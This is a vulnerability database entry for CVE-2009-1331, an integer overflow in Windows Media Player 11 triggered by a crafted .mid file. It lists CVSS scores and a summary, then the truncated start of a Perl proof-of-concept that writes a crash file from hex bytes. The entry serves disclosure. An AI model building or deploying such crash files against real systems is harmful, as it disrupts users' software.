9.3
CVSSv2

CVE-2009-1331

Published: 17/04/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote malicious users to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows media player 11.0.5721.5260

Exploits

#! /usr/bin/perl # # Windows Media Player (mid file) Integer Overflow PoC # By HuoFu # # Test Windows Media Player Ver: 11057215260 # open(Fin, ">crashmid") || die "can't create crash sample$!"; $data = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54" "\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61" ...